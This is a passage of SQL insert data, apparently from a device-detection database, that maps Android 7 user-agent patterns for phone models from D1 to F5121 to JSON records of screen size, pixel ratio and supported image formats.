(KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; D1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; D24_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; D5 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; DANDY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; DLI-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; DLI-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; DLI-L42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; DLI-TL20) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; DLI-TL20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; DM-01K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; DUK-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Dash L4 LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Delight TH201) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Diamond_LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Doro 8035) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Doro 8040) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Duubee E1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; E2 Noir) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; E435 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; E5051) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; E561) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; E5803) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; E5823) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; E6533) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; E6553) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; E6603) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; E6633) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; E6653) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; E6683) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; E6810) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; E6833) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; E6853) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; E6883) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; E7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; E7s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; EASYSMARTM3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ECHO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ECHO_HOLI) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ECHO_STUDIO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; EDA50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; EKO OMEGA Q55) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ELEMENT Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ELEMENT_PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ELUGA A4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; EO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; EPIC T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ERGO B500 First) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ERGO F501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ERGO_A556) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ES750) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; ET) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; EVA-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; EVA-L19) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; EVA-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; EVOLVEO StrongPhone G4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; EVOLVEO StrongPhone G8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Eagle_4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Easy-Power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Easy-Power-Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Easy_XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Easy_XL_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Elegance_4_0_black) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Elite 45T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Elite 4T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Eluga_Ray_700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Energy E12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F-01J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F-01K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F-02H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F-03H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F-03K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F-04H) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F-05J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F3111) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F3112) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F3113) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F3115) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F3116) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F3211) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F3212) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F3213) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F3215) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F3216) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F501_Magic) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; F5121) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 